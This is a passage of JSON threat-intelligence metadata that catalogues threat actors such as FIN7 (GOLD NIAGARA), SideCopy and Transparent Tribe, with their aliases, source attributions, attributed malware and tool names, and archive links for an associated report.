"deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "b584b10a-7d54-4d05-9e21-b223563df7b8", "created_at": "2022-10-25T16:07:24.181589Z", "updated_at": "2026-04-10T02:00:04.892659Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "G1008", "Mocking Draco", "TAG-140", "UNC2269", "White Dev 55" ], "source_name": "ETDA:SideCopy", "tools": [ "ActionRAT", "AllaKore", "Allakore RAT", "AresRAT", "Bladabindi", "CetaRAT", "DetaRAT", "EpicenterRAT", "Jorik", "Lilith", "Lilith RAT", "MargulasRAT", "ReverseRAT", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "abb24b7b-6baa-4070-9a2b-aa59091097d1", "created_at": "2022-10-25T16:07:24.339942Z", "updated_at": "2026-04-10T02:00:04.944806Z", "deleted_at": null, "main_name": "Transparent Tribe", "aliases": [ "APT 36", "APT-C-56", "Copper Fieldstone", "Earth Karkaddan", "G0134", "Green Havildar", "Mythic Leopard", "Opaque Draco", "Operation C-Major", "Operation Honey Trap", "Operation Transparent Tribe", "ProjectM", "STEPPY-KAVACH", "Storm-0156", "TEMP.Lapis", "Transparent Tribe" ], "source_name": "ETDA:Transparent Tribe", "tools": [ "Amphibeon", "Android RAT", "Bezigate", "Bladabindi", "Bozok", "Bozok RAT", "BreachRAT", "Breut", "CapraRAT", "CinaRAT", "Crimson RAT", "DarkComet", "DarkKomet", "ElizaRAT", "FYNLOS", "Fynloski", "Jorik", "Krademok", "Limepad", "Luminosity RAT", "LuminosityLink", "MSIL", "MSIL/Crimson", "Mobzsar", "MumbaiDown", "Oblique RAT", "ObliqueRAT", "Peppy RAT", "Peppy Trojan", "Quasar RAT", "QuasarRAT", "SEEDOOR", "Scarimson", "SilentCMD", "Stealth Mango", "UPDATESEE", "USBWorm", "Waizsar RAT", "Yggdrasil", "beendoor", "klovbot", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "c68fa27f-e8d9-4932-856b-467ccfe39997", "created_at": "2023-01-06T13:46:38.450585Z", "updated_at": "2026-04-10T02:00:02.980334Z", "deleted_at": null, "main_name": "Operation C-Major", "aliases": [ "APT36", "APT 36", "TMP.Lapis", "COPPER FIELDSTONE", "Storm-0156", "Transparent Tribe", "ProjectM", "Green Havildar", "Earth Karkaddan", "C-Major", "Mythic Leopard" ], "source_name": "MISPGALAXY:Operation C-Major", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434203, "ts_updated_at": 1775792210, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/79f4b1bcebeeb5fb35820153d72dea177ecc15e0.pdf", "text": "https://archive.orkl.eu/79f4b1bcebeeb5fb35820153d72dea177ecc15e0.txt", "img": "https://archive.orkl.eu/79f4b1bcebeeb5fb35820153d72dea177ecc15e0.jpg" } }